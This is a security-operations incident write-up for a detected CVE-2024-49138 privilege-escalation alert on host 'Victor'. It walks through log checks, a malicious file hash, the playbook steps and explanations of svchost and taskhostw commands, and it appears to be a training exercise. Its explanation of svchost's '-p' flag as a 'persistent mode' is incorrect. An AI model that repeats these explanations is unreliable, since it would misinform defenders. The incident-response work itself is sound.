### Privilege Escalation Case - SOC335-CVE-2024-49138-Exploitation-Detected
## Alert Overview
### Affected Hostname:
- **Victor**
### Triggering Process:
- **scohost.exe**
### Parent Process:
- **`C:\Windows\System32\WINDOWSPOWERSHELL\V1.0\powershell.exe`**
### File Hash:
- **`b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9`**
### Trigger Reason:
- Unusual or suspicious patterns of behavior linked to the hash have been identified, indicating potential exploitation of **CVE-2024-49138**.
---
We start with investigating the alert we received and proceed to check Log Management and Endpoint Security.
<img src="https://i.imgur.com/J6jEzDr.png" width="500">
There is multiple OS types with either Admin or Guest showing Error Code: **0xC000006D**
<img src="https://i.imgur.com/vyq4J4o.png" width="500">
<img src="https://i.imgur.com/t6fX5rO.png" width="500">
### Error Code: **0xC000006D**
### Translation:
- **STATUS_LOGON_FAILURE**: Indicates a logon attempt failed, usually due to incorrect credentials.
### We then look into the Hash we had provided to us in the Alert.
<img src="https://i.imgur.com/JZY3ovS.png" width="500">
We see it is confirmed Malicious, we also confirm MITRE ATT&CK & Malware Behaviour.
<img src="https://i.imgur.com/voXLdWH.png" width="500">
### We proceed to move to Terminal History and see suspicious activity.
<img src="https://i.imgur.com/LRT5LZ1.png" width="500">
We also spot $url which retrieves the URL we see there.
### We collected the information we need, we proceed with our Playbook for this case.
<img src="https://i.imgur.com/5pYW4ql.png" width="500">
### We confirmed through our Log management and Endpoint Security that the Malware has not been contained as of this moment.
<img src="https://i.imgur.com/YRnxmbf.png" width="500">
### Malware has been analyzed and confirmed Malicous
### On the next step we want to find the C2 address.
<img src="https://i.imgur.com/o6hbi8p.png" width="500">
We proceeded to check the malware behaviour through AnyRun and confirmed the C2 Address as we show in the below image.
<img src="https://i.imgur.com/aSVWPhe.png" width="500">
## Command Analysis
### **Command 1**: `C:\Windows\System32\svchost.exe -k termsvcs -s TermService`
#### Explanation
1. **`C:\Windows\System32\svchost.exe`**:
- **Service Host Process**: A core Windows system process used to host multiple Windows services implemented as dynamic-link libraries (DLLs).
- Legitimately located in **`C:\Windows\System32\`**.
2. **`-k termsvcs`**:
- Specifies the **service group** (`termsvcs`) for this instance of `svchost.exe`.
- The `termsvcs` group is specifically related to Terminal Services.
3. **`-s TermService`**:
- Specifies the exact service to start: **Remote Desktop Services (TermService)**.
- This service allows remote connections to the computer, enabling the Remote Desktop Protocol (RDP).
#### Purpose of `TermService`
- **Remote Desktop Services**:
- Manages remote desktop connections, including user sessions over RDP.
- Essential for enabling remote administration or remote desktop features.
---
### **Command 2**: `C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule`
#### Explanation
1. **`C:\Windows\system32\svchost.exe`**:
- **Service Host Process**: A critical Windows system process used to host services implemented as dynamic-link libraries (DLLs).
- Always ensure this file is located in **`C:\Windows\system32\`**.
2. **`-k netsvcs`**:
- Specifies the **service group** (`netsvcs`) that this instance of `svchost.exe` is hosting.
- The `netsvcs` group typically includes networking-related and other essential services.
3. **`-p`**:
- Indicates the service should run in **persistent mode**, ensuring it stays active and is automatically restarted if needed.
4. **`-s Schedule`**:
- Specifies a specific service within the group to load: **Task Scheduler** (`Schedule`).
- The Task Scheduler service manages tasks that run at specific times or in response to certain triggers.
5. **Process ID**:
- **1996** is the **Process ID (PID)** for the instance of `svchost.exe` managing the Task Scheduler service.
---
### **Command 3**: `C:\Windows\system32\svchost.exe -k DcomLaunch -p`
#### Explanation
1. **`C:\Windows\system32\svchost.exe`**:
- **Service Host Process**: A core Windows system process that acts as a host for running multiple services from dynamic-link libraries (DLLs).
2. **`-k DcomLaunch`**:
- Specifies the **service group** the process is hosting.
- **DcomLaunch**: Refers to the **DCOM Server Process Launcher**, responsible for launching Distributed Component Object Model (DCOM) services.
3. **`-p`**:
- Indicates that the process should be **persistent** and restarted if terminated unexpectedly.
#### Purpose of `DcomLaunch`
- **System Component**: Vital for many Windows operations, such as enabling communication between applications, activating processes, and handling system-level RPC requests.
- **Dependencies**: Many core services, including Windows Update and COM-related applications, rely on this process.
---
## Taskhostw.exe and Key Roaming
### **`taskhostw.exe`**
- **Task Host Window**: A generic host process for Windows tasks.
- **Location**: The legitimate executable is located in **`C:\Windows\System32\`**.
### **Key Roaming**
- A Windows feature enabling **credential roaming** for certificates and private keys across devices in an Active Directory environment.
### Connection:
- If **`taskhostw.exe`** interacts with **Key Roaming**, it may indicate background tasks syncing credentials in an Active Directory environment.
[4.0K] /data/pocs/4b87775349108600732a37f72003b6e3507e8f8a
└── [5.6K] README.md
0 directories, 1 file